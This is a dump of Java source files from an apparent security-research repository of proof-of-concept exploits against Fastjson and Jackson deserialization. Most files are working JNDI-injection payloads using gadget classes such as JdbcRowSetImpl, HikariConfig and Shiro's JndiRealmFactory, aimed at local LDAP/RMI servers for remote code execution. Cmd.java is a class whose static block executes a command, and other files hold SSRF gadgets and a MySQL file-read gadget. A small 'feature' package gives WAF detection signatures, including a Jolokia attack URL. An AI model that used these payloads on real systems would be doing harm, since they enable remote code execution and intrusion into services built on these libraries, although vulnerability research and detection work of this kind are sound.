/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/AriesJMSPoc2.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.LdapServer;
6 | import java.io.IOException;
7 |
8 | /**
9 | * todo 发现新的Fastjson利用面,通过$ref引用功能,可以任意触发大部分getter方法,理论可以通过此种方式RCE,还能在不开启AutoType的情况下,任意调用大部分当前反序列化对象的getter方法,若存在危险method,就能进行攻击
10 | *
11 | *
12 | * org.apache.aries.transaction
13 | * org.apache.aries.transaction.jms
14 | * 2.0.0
15 | *
16 | *
17 | * @author threedr3am
18 | */
19 | public class AriesJMSPoc2 {
20 |
21 | static {
22 | //rmi server示例
23 | // RmiServer.run();
24 |
25 | //ldap server示例
26 | LdapServer.run();
27 | }
28 |
29 | public static void main(String[] args) throws IOException {
30 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
31 |
32 | String json = "{\"@type\":\"org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory\", \"tmJndiName\": \"ldap://localhost:43658/Calc\", \"tmFromJndi\": true, \"transactionManager\": {\"$ref\":\"$.transactionManager\"}}";
33 | JSON.parse(json);
34 | }
35 |
36 |
37 | }
38 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/Cmd.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.sun.org.apache.xalan.internal.xsltc.DOM;
4 | import com.sun.org.apache.xalan.internal.xsltc.TransletException;
5 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
6 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
7 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
8 |
9 | import java.io.IOException;
10 |
11 | /**
12 | * fastjson反序列化利用class
13 | *
14 | * Created by threedr3am on 2018/5/5.
15 | */
16 | public class Cmd extends AbstractTranslet{
17 |
18 | static {
19 | try {
20 | Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
21 | } catch (Throwable e) {
22 | e.printStackTrace();
23 | }
24 | }
25 |
26 | @Override
27 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
28 |
29 | }
30 |
31 | @Override
32 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
33 |
34 | }
35 | }
36 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/CocoonSlidePoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.LdapServer;
6 |
7 | /**
8 | * fastjson <= 1.2.62 RCE,需要开启AutoType (report by threedr3am to ASRC)
9 | *
10 | * PS:因为引用了javax/jms/JMSException类,所以必须在javaee环境下
11 | *
12 | *
13 | * slide
14 | * slide-kernel
15 | * 2.1
16 | *
17 | *
18 | * cocoon
19 | * cocoon-slide
20 | * 2.1.11
21 | *
22 | *
23 | * @author threedr3am
24 | */
25 | public class CocoonSlidePoc {
26 | static {
27 | //rmi server示例
28 | // RmiServer.run();
29 |
30 | //ldap server示例
31 | LdapServer.run();
32 | }
33 |
34 | public static void main(String[] args) {
35 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
36 |
37 | String fastjsonPayload = "{\"@type\":\"org.apache.cocoon.components.slide.impl.JMSContentInterceptor\", \"parameters\": {\"@type\":\"java.util.Hashtable\",\"java.naming.factory.initial\":\"com.sun.jndi.rmi.registry.RegistryContextFactory\",\"topic-factory\":\"ldap://127.0.0.1:43658/Calc\"}, \"namespace\":\"\"}";
38 | JSON.parse(fastjsonPayload);
39 | }
40 | }
41 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/CommonsProxyPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.LdapServer;
6 | import com.threedr3am.bug.common.server.RmiServer;
7 |
8 | /**
9 | * fastjson <= 1.2.61 RCE,需要开启AutoType
10 | *
11 | *
12 | * org.apache.commons
13 | * commons-proxy
14 | *
15 | *
16 | * @author threedr3am
17 | */
18 | public class CommonsProxyPoc {
19 |
20 | static {
21 | //rmi server示例
22 | // RmiServer.run();
23 |
24 | //ldap server示例
25 | LdapServer.run();
26 | }
27 |
28 | public static void main(String[] args) {
29 | //TODO 使用rmi server模式时,jdk版本高的需要开启URLCodebase trust
30 | // System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
31 |
32 | ParserConfig.global.setAutoTypeSupport(true);
33 |
34 | // String payload = "{\"@type\":\"org.apache.commons.proxy.provider.remoting.SessionBeanProvider\",\"jndiName\":\"rmi://localhost:43657/Calc\"}";
35 | String payload = "{\"@type\":\"org.apache.commons.proxy.provider.remoting.SessionBeanProvider\",\"jndiName\":\"ldap://localhost:43658/Calc\",\"Object\":\"a\"}";
36 |
37 | try {
38 | JSON.parseObject(payload);
39 | } catch (Exception e) {
40 | e.printStackTrace();
41 | }
42 |
43 |
44 | JSON.parseObject(payload);
45 | }
46 | }
47 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/FastjsonSerialize.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.Feature;
5 | import com.threedr3am.bug.common.utils.FileToByteArrayUtil;
6 | import sun.misc.BASE64Encoder;
7 |
8 | /**
9 | * 利用fastjson开启type的漏洞,fastjson版本<=1.2.24 + Feature.SupportNonPublicField
10 | *
11 | * Created by threedr3am on 2018/5/5.
12 | */
13 | public class FastjsonSerialize {
14 | public static void main(String[] args) {
15 | testSimpleExp();
16 | }
17 |
18 | private static void testSimpleExp() {
19 | try {
20 | StringBuilder stringBuilder = new StringBuilder();
21 | stringBuilder.append("{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",");
22 | String base64Class = new BASE64Encoder().encode(FileToByteArrayUtil.readCallbackRuntimeClassBytes("com/threedr3am/bug/fastjson/rce/Cmd.class"));
23 | base64Class = base64Class.replaceAll("\\r\\n","");
24 | stringBuilder.append("\"_bytecodes\":[\""+base64Class+"\"],");
25 | stringBuilder.append("\"_name\":\"a.b\",");
26 | stringBuilder.append("\"_tfactory\":{},");
27 | stringBuilder.append("\"_outputProperties\":{}}");
28 | String exp = stringBuilder.toString();
29 | System.out.println(exp);
30 | //漏洞利用条件,fastjson版本<=1.2.24 + Feature.SupportNonPublicField
31 | JSON.parseObject(exp,Object.class, Feature.SupportNonPublicField);
32 | } catch (Exception e) {
33 | e.printStackTrace();
34 | }
35 | }
36 |
37 | }
38 |
39 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/HadoopHikariPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.LdapServer;
6 | import com.threedr3am.bug.common.server.RmiServer;
7 |
8 | /**
9 | * fastjson <= 1.2.68 RCE,需要开启AutoType (report by threedr3am to ASRC)
10 | *
11 | *
12 | * org.apache.hadoop
13 | * hadoop-client-minicluster
14 | * 3.2.1
15 | *
16 | *
17 | * @author threedr3am
18 | */
19 | public class HadoopHikariPoc {
20 | static {
21 | //rmi server示例
22 | // RmiServer.run();
23 |
24 | //ldap server示例
25 | LdapServer.run();
26 | }
27 |
28 | public static void main(String[] args) {
29 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
30 |
31 | // String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://localhost:43657/Calc\"}";
32 | String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";
33 | JSON.parse(payload);
34 | }
35 | }
36 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/HikariConfigPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.LdapServer;
6 |
7 | /**
8 | * fastjson <= 1.2.59 RCE,需要开启AutoType
9 | *
10 | *
11 | *
12 | * com.zaxxer
13 | * HikariCP
14 | *
15 | *
16 | * @author threedr3am
17 | */
18 | public class HikariConfigPoc {
19 |
20 | static {
21 | //rmi server示例
22 | // RmiServer.run();
23 |
24 | //ldap server示例
25 | LdapServer.run();
26 | }
27 |
28 | public static void main(String[] args) {
29 | //TODO 使用rmi server模式时,jdk版本高的需要开启URLCodebase trust
30 | // System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
31 |
32 |
33 | ParserConfig.global.setAutoTypeSupport(true);
34 |
35 | // String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://localhost:43657/Calc\"}";
36 | // String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"rmi://localhost:43657/Calc\"}";
37 | String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"ldap://localhost:43658/Calc\"}";
38 | String payload2 = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";
39 | JSON.parse(payload);
40 | }
41 | }
42 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/IbatisSqlmapPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.LdapServer;
6 |
7 | /**
8 | * fastjson <= 1.2.62 RCE,需要开启AutoType (report by threedr3am to 阿里云先知众测 - 内部已知)
9 | *
10 | *
11 | * org.apache.ibatis
12 | * ibatis-sqlmap
13 | * 2.3.4.726
14 | *
15 | *
16 | *
17 | * javax
18 | * javaee-api
19 | * 8.0.1
20 | *
21 | *
22 | * @author threedr3am
23 | */
24 | public class IbatisSqlmapPoc {
25 | static {
26 | //rmi server示例
27 | // RmiServer.run();
28 |
29 | //ldap server示例
30 | LdapServer.run();
31 | }
32 |
33 | public static void main(String[] args) {
34 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
35 |
36 | String payload = "{\"@type\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\",\"properties\": {\"@type\":\"java.util.Properties\",\"UserTransaction\":\"ldap://localhost:43658/Calc\"}}";//ldap方式
37 | JSON.parse(payload);
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/IgniteJtaPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.LdapServer;
6 | import java.io.IOException;
7 |
8 | /**
9 | * todo 发现新的Fastjson利用面,通过$ref引用功能,可以任意触发大部分getter方法,理论可以通过此种方式RCE,还能在不开启AutoType的情况下,任意调用大部分当前反序列化对象的getter方法,若存在危险method,就能进行攻击
10 | *
11 | * fastjson <= 1.2.67
12 | *
13 | *
14 | * org.apache.ignite
15 | * ignite-jta
16 | * 2.8.0
17 | *
18 | *
19 | * @author threedr3am
20 | */
21 | public class IgniteJtaPoc {
22 |
23 | static {
24 | //rmi server示例
25 | // RmiServer.run();
26 |
27 | //ldap server示例
28 | LdapServer.run();
29 | }
30 |
31 | public static void main(String[] args) throws IOException {
32 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
33 |
34 | String json = "{\"@type\":\"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\", \"jndiNames\":[\"ldap://localhost:43658/Calc\"], \"tm\": {\"$ref\":\"$.tm\"}}";
35 | JSON.parse(json);
36 | }
37 |
38 | }
39 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/JndiConverterPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.LdapServer;
6 |
7 | /**
8 | * fastjson <= 1.2.62 RCE,需要开启AutoType (report by threedr3am to ASRC)
9 | *
10 | * Jackson-databind的CVE-2020-8840 gadget与Fastjson通用
11 | *
12 | * XBean-reflect依赖的gadget
13 | *
14 | *
15 | * org.apache.xbean
16 | * xbean-reflect
17 | *
18 | *
19 | * @author threedr3am
20 | */
21 | public class JndiConverterPoc {
22 | static {
23 | //rmi server示例
24 | // RmiServer.run();
25 |
26 | //ldap server示例
27 | LdapServer.run();
28 | }
29 |
30 | public static void main(String[] args) {
31 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
32 |
33 | String payload = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"asText\":\"ldap://localhost:43658/Calc\"}";//ldap方式
34 | JSON.parse(payload);
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/NoNeedAutoTypePoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.threedr3am.bug.common.server.LdapServer;
5 | import com.threedr3am.bug.common.server.RmiServer;
6 |
7 | /**
8 | * fastjson 1.2.48以下不需要任何配置,默认配置通杀RCE
9 | *
10 | * @author threedr3am
11 | */
12 | public class NoNeedAutoTypePoc {
13 |
14 | static {
15 | //rmi server示例
16 | // RmiServer.run();
17 |
18 | //ldap server示例
19 | LdapServer.run();
20 | }
21 |
22 | public static void main(String[] args) {
23 | //TODO 使用rmi server模式时,jdk版本高的需要开启URLCodebase trust
24 | // System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
25 |
26 | /*
27 | * TODO 该payload需要先通过java.lang.Class把com.sun.rowset.JdbcRowSetImpl加载进fastjson缓存,然后利用
28 | * TODO checkAutoType方法的缺陷(先通过缓存查询,有则立马返回,JdbcRowSetImpl否则检查黑名单hash)绕过黑名单和autoType的检查
29 | */
30 | // String payload = "[{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:43657/Calc\",\"autoCommit\":true}]";//rmi方式
31 | String payload = "[{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:43658/Calc\",\"autoCommit\":true}]";//ldap方式
32 | JSON.parse(payload);
33 | //所以,该payload需要分两步进行
34 | }
35 | }
36 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/QuercusPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.LdapServer;
6 | import org.springframework.security.web.savedrequest.DefaultSavedRequest;
7 |
8 | /**
9 | * todo 发现新的Fastjson利用面,通过$ref引用功能,可以任意触发大部分getter方法,理论可以通过此种方式RCE,还能在不开启AutoType的情况下,任意调用大部分当前反序列化对象的getter方法,若存在危险method,就能进行攻击
10 | *
11 | * fastjson <= 1.2.68 RCE,需要开启AutoType
12 | *
13 | *
14 | * quercus ResourceRef jndi gadget
15 | *
16 | *
17 | * com.caucho
18 | * quercus
19 | * 4.0.63
20 | *
21 | *
22 | * @author threedr3am
23 | */
24 | public class QuercusPoc {
25 | static {
26 | //rmi server示例
27 | // RmiServer.run();
28 |
29 | //ldap server示例
30 | LdapServer.run();
31 | }
32 |
33 | public static void main(String[] args) {
34 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
35 |
36 | String payload = "{\"@type\":\"com.caucho.config.types.ResourceRef\",\"lookupName\": \"ldap://localhost:43658/Calc\", \"value\": {\"$ref\":\"$.value\"}}";//ldap方式
37 | JSON.parse(payload);
38 | }
39 | }
40 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/ShiroPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.LdapServer;
6 |
7 | /**
8 | * fastjson <= 1.2.66 RCE,需要开启AutoType
9 | *
10 | *
11 | * shiro-core gadget
12 | *
13 | *
14 | * org.apache.shiro
15 | * shiro-core
16 | *
17 | *
18 | * @author threedr3am
19 | */
20 | public class ShiroPoc {
21 | static {
22 | //rmi server示例
23 | // RmiServer.run();
24 |
25 | //ldap server示例
26 | LdapServer.run();
27 | }
28 |
29 | public static void main(String[] args) {
30 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
31 |
32 | String payload = "{\"@type\":\"org.apache.shiro.realm.jndi.JndiRealmFactory\", \"jndiNames\":[\"ldap://localhost:43658/Calc\"], \"Realms\":[\"\"]}";//ldap方式
33 | JSON.parse(payload);
34 | }
35 | }
36 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/ShiroPoc2.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.rce;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.LdapServer;
6 | import java.io.IOException;
7 |
8 | /**
9 | * todo 发现新的Fastjson利用面,通过$ref引用功能,可以任意触发大部分getter方法,理论可以通过此种方式RCE,还能在不开启AutoType的情况下,任意调用大部分当前反序列化对象的getter方法,若存在危险method,就能进行攻击
10 | *
11 | * fastjson <= 1.2.67
12 | *
13 | * @author threedr3am
14 | */
15 | public class ShiroPoc2 {
16 | static {
17 | //rmi server示例
18 | // RmiServer.run();
19 |
20 | //ldap server示例
21 | LdapServer.run();
22 | }
23 |
24 | public static void main(String[] args) throws IOException {
25 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
26 |
27 | String json = "{\"@type\":\"org.apache.shiro.jndi.JndiObjectFactory\",\"resourceName\":\"ldap://localhost:43658/Calc\",\"instance\":{\"$ref\":\"$.instance\"}}";
28 | JSON.parse(json);
29 |
30 | }
31 | }
32 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/ssrf/ApacheCxfSSRFPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.ssrf;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.HTTPServer;
6 |
7 | /**
8 | * fastjson <= 1.2.66 RCE,需要开启AutoType (Discovered by threedr3am) 水
9 | *
10 | *
11 | *
12 | * org.apache.cxf
13 | * cxf-core
14 | * 3.3.5
15 | *
16 | *
17 | * org.apache.cxf
18 | * cxf-bundle
19 | * 2.7.18
20 | *
21 | *
22 | * @author threedr3am
23 | */
24 | public class ApacheCxfSSRFPoc {
25 |
26 | static {
27 | HTTPServer.PORT = 23234;
28 | HTTPServer.run(null);
29 | }
30 |
31 | public static void main(String[] args) {
32 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
33 | String payload = "{\"@type\":\"org.apache.cxf.jaxrs.model.wadl.WadlGenerator\",\"schemaLocations\": \"http://127.0.0.1:23234?a=1&b=22222\"}";
34 | try {
35 | JSON.parse(payload);
36 | } catch (Exception e) {
37 | e.printStackTrace();
38 | }
39 | }
40 | }
41 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/ssrf/ApacheCxfSSRFPoc2.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.ssrf;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.HTTPServer;
6 |
7 | /**
8 | * fastjson <= 1.2.66 RCE,需要开启AutoType (Discovered by threedr3am) 水
9 | *
10 | *
11 | *
12 | * org.apache.cxf
13 | * cxf-core
14 | * 3.3.5
15 | *
16 | *
17 | * org.apache.cxf
18 | * cxf-bundle
19 | * 2.7.18
20 | *
21 | *
22 | * @author threedr3am
23 | */
24 | public class ApacheCxfSSRFPoc2 {
25 |
26 | static {
27 | HTTPServer.PORT = 23234;
28 | HTTPServer.run(null);
29 | }
30 |
31 | public static void main(String[] args) {
32 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
33 | String payload = "{\"@type\":\"org.apache.cxf.jaxrs.utils.schemas.SchemaHandler\",\"schemaLocations\": \"http://127.0.0.1:23234?a=1&b=22222\"}";
34 | try {
35 | JSON.parse(payload);
36 | } catch (Exception e) {
37 | e.printStackTrace();
38 | }
39 | }
40 | }
41 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/ssrf/CommonsJellySSRFPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.ssrf;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.HTTPServer;
6 |
7 | /**
8 | * fastjson <= 1.2.66 RCE,需要开启AutoType (Discovered by threedr3am) 水
9 | *
10 | *
11 | *
12 | * commons-jelly
13 | * commons-jelly
14 | * 1.0.1
15 | *
16 | *
17 | * @author threedr3am
18 | */
19 | public class CommonsJellySSRFPoc {
20 |
21 | static {
22 | HTTPServer.PORT = 23234;
23 | HTTPServer.run(null);
24 | }
25 |
26 | public static void main(String[] args) {
27 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
28 | String payload = "{\"@type\":\"org.apache.commons.jelly.impl.Embedded\",\"script\": \"http://127.0.0.1:23234?aaaa=111&bb=242\"}";
29 | try {
30 | JSON.parse(payload);
31 | } catch (Exception e) {
32 | e.printStackTrace();
33 | }
34 | }
35 | }
36 |
--------------------------------------------------------------------------------
/fastjson/src/main/java/com/threedr3am/bug/fastjson/ssrf/JREJeditorPaneSSRFPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.fastjson.ssrf;
2 |
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.ParserConfig;
5 | import com.threedr3am.bug.common.server.HTTPServer;
6 |
7 | /**
8 | * fastjson <= 1.2.68 RCE,需要开启AutoType(todo JRE自带依赖) (Discovered by threedr3am) 这个还是蛮好的gadget
9 | *
10 | * @author threedr3am
11 | */
12 | public class JREJeditorPaneSSRFPoc {
13 |
14 | static {
15 | HTTPServer.PORT = 23234;
16 | HTTPServer.run(null);
17 | }
18 |
19 | public static void main(String[] args) {
20 | ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
21 | String payload = "{\"@type\":\"javax.swing.JEditorPane\",\"page\": \"http://127.0.0.1:23234?a=1&b=22222\"}";
22 | try {
23 | JSON.parse(payload);
24 | } catch (Exception e) {
25 | e.printStackTrace();
26 | }
27 | }
28 | }
29 |
--------------------------------------------------------------------------------
/feature/src/main/java/com/threedr3am/bug/feature/CAS4$1And4$2.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.feature;
2 |
3 | /**
4 | *
5 | * CAS 4.1.x-4.1.6 and 4.1.7-4.2.x 反序列化攻击特征
6 | *
7 | * @author threedr3am
8 | */
9 | public class CAS4$1And4$2 {
10 |
11 | }
12 |
--------------------------------------------------------------------------------
/feature/src/main/java/com/threedr3am/bug/feature/JavaClassByteCode.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.feature;
2 |
3 | import java.io.IOException;
4 | import java.io.InputStream;
5 |
6 | /**
7 | *
8 | * Java字节码特征
9 | *
10 | * @author threedr3am
11 | */
12 | public class JavaClassByteCode {
13 |
14 | public static void main(String[] args) throws IOException {
15 | testClass(Object.class.getResourceAsStream("String.class"));
16 | testClass(JavaClassByteCode.class.getResourceAsStream("JavaClassByteCode.class"));
17 | }
18 |
19 | private static void testClass(InputStream inputStream) throws IOException {
20 | byte[] bytes = new byte[inputStream.available()];
21 | inputStream.read(bytes);
22 | StringBuilder stringBuilder = new StringBuilder();
23 | for (int i = 0; i < bytes.length; i++) {
24 | stringBuilder.append(String.format("\\x%x ", bytes[i]));
25 | }
26 | printAndMatch(stringBuilder.toString());
27 | }
28 |
29 | private static void printAndMatch(String bytes) {
30 | System.out.println(bytes);
31 | System.out.println(bytes.replaceAll(" ", "").contains("\\xca\\xfe\\xba\\xbe"));
32 | }
33 | }
34 |
--------------------------------------------------------------------------------
/feature/src/main/java/com/threedr3am/bug/feature/JolokiaAttackUrlFeature.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.feature;
2 |
3 | import java.util.regex.Pattern;
4 |
5 | /**
6 | *
7 | * actuator + jolokia bug特征
8 | *
9 | * @author threedr3am
10 | */
11 | public class JolokiaAttackUrlFeature {
12 |
13 | static String exampleURL = "http://localhost:8080/" + "jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/" + "http:!/!/127.0.0.1:8888!/logback-evil.xml";
14 |
15 |
16 | public static void main(String[] args) {
17 | System.out.println(exampleURL);
18 | System.out.println(Pattern.compile("/jolokia/exec/").matcher(exampleURL).find());
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/feature/src/main/java/com/threedr3am/bug/feature/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | * 一些Java攻击的 数据特征 以及 检测方法(用于WAF)
3 | *
4 | * @author threedr3am
5 | */
6 | package com.threedr3am.bug.feature;
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/MysqlFileRead.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import java.io.IOException;
5 |
6 | /**
7 | * CVE-2019-12086
8 | * jackson文件读取,2.x - 2.9.9,mysql < 8.0.14
9 | * https://github.com/Gifts/Rogue-MySql-Server
10 | * @author threedr3am
11 | */
12 | public class MysqlFileRead {
13 |
14 | public static void main(String[] args) throws IOException {
15 | ObjectMapper mapper = new ObjectMapper();
16 | mapper.enableDefaultTyping();
17 | //需要指定Rogue-MySql-Server地址
18 | String json = "[\"com.mysql.cj.jdbc.admin.MiniAdmin\", \"jdbc:mysql://127.0.0.1:3306/\"]";
19 | mapper.readValue(json, Object.class);
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/package-info.java:
--------------------------------------------------------------------------------
1 | /**
2 | * @author threedr3am
3 | *
4 | * CVE-2020-8840 com.threedr3am.bug.jackson.rce.JndiConverterPoc
5 | * CVE-2019-20330 com.threedr3am.bug.jackson.EhcacheJndi2
6 | * CVE-2019-14379 com.threedr3am.bug.jackson.rce.EhcacheJndi
7 | * CVE-2019-12384 com.threedr3am.bug.jackson.rce.H2Rce
8 | * CVE-2019-12086 com.threedr3am.bug.jackson.MysqlFileRead
9 | *
10 | *
11 | *
12 | */
13 | package com.threedr3am.bug.jackson;
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/AnterosPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
2 |
3 | import com.fasterxml.jackson.databind.ObjectMapper;
4 | import com.threedr3am.bug.common.server.LdapServer;
5 | import java.io.IOException;
6 |
7 | /**
8 | *
9 | * jackson-databind <= 2.10.2 and <= 2.9.10.3 RCE,需要开启DefaultType (reported by threedr3am & V1ZkRA)
10 | *
11 | * CVE-2020-9547, CVE-2020-9548
12 | *
13 | *
14 | * com.codahale.metrics
15 | * metrics-healthchecks
16 | * 3.0.2
17 | *
18 | *
19 | *
20 | * br.com.anteros
21 | * Anteros-Core
22 | * 1.2.1
23 | *
24 | *
25 | *
26 | * br.com.anteros
27 | * Anteros-DBCP
28 | * 1.0.1
29 | *
30 | *
31 | * @author threedr3am
32 | */
33 | public class AnterosPoc {
34 |
35 | static {
36 | //rmi server示例
37 | // RmiServer.run();
38 |
39 | //ldap server示例
40 | LdapServer.run();
41 | }
42 |
43 | public static void main(String[] args) throws IOException {
44 | ObjectMapper mapper = new ObjectMapper();
45 | mapper.enableDefaultTyping();
46 |
47 | String json = "[\"br.com.anteros.dbcp.AnterosDBCPConfig\", {\"healthCheckRegistry\": \"ldap://localhost:43658/Calc\"}]";
48 | mapper.readValue(json, Object.class);
49 | }
50 |
51 | }
52 |
--------------------------------------------------------------------------------
/jackson/src/main/java/com/threedr3am/bug/jackson/rce/AriesJMSPoc.java:
--------------------------------------------------------------------------------
1 | package com.threedr3am.bug.jackson.rce;
